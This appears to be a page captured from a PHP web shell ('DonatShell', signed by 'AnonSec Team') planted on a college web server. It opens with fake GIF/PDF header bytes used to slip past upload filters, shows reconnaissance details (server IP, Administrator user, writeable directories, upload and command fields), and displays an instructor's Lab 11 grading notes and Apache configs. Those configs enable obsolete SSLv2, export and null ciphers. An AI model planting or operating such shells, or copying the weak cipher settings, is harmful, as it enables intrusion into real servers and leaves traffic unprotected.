GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/Classes/CST1611/Labs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/Classes/CST1611/Labs//CST1611_Lab11_grading_notes.txt
Lab 11 - Authentication

Grading Criteria
Demonstrated assignment effectively: 10 points.
There are some things I expect. If they are incorrect you will lose the following:
Work submitted incorrectly: -1 pt. This covers errors such as incorrect files names, incorrect file formats, poor formatting, etc.
Second and subsequent submission of work for grading: -1 pt.
Work submitted late: -1 pt per week.
I reserve the right not to apply the deduction points at my absolute discretion.

-15 Work submitted incorrectly.
    You did not include a copy of your hosts or httpd.conf file in your submission.
=e

-15 Work submitted incorrectly.
    You did not include a copy of your hosts or httpd.conf file in your submission.
    Instead you have Windows shortcuts. Without these files I cannot verify your work.
   
-15 The hosts and httpd.conf files were not included in your submission.
=e

-15 The httpd.conf file was not included in your submission.
=e

-10 The DocumentRoot and Directory directives for your CST1611.loc site are incorrect.
    The Alias and Redirect directives are incorrect as well.
=e

-0 Work submitted incorrectly.
   Why is you hosts file named hosts.txt?

# Lab11
<VirtualHost *>
	DocumentRoot C:/Data_WWW/CST1611/Lab11
	ServerName Lab11.test
	ErrorLog logs/Lab11.test.Error.log
	CustomLog logs/Lab11.test.Access.log common
	<Directory C:/Data_WWW/CST1611/Lab11/>
		AuthType Basic
		AuthName "Lab 11 root directory authentication"
		AuthBasicProvider file
		AuthUserFile C:/Data_WWW/CST1611/Lab11/.htpasswd
		Require valid-user
		Options All +MultiViews
		AllowOverride All
#		Require all granted
	</Directory>
</VirtualHost>

# Lab11 with https
<VirtualHost *:443>
	DocumentRoot "C:/Data_WWW/CST1611/Lab11"
	ServerName Lab11.test
	ErrorLog logs/Lab11.test.Error.log
	CustomLog logs/Lab11.test.Access.log common
	SSLEngine on
	SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
	SSLCertificateFile "C:/Data_WWW/CST1611/Lab05/Lab05.test.crt"				
	SSLCertificateKeyFile "C:/Data_WWW/CST1611/Lab05/Lab05.test.key"					
	<Directory "C:/Data_WWW/CST1611/Lab11/">
		Options All +MultiViews
		AllowOverride All
		AuthType basic
		AuthName "Lab 11 root directory authentication"
		AuthBasicProvider file
		AuthUserFile "C:/Data_WWW/CST1611/Lab11/.htpasswd"
		Require valid-user
	</Directory>
</VirtualHost>

Anon7 - 2022
AnonSec Team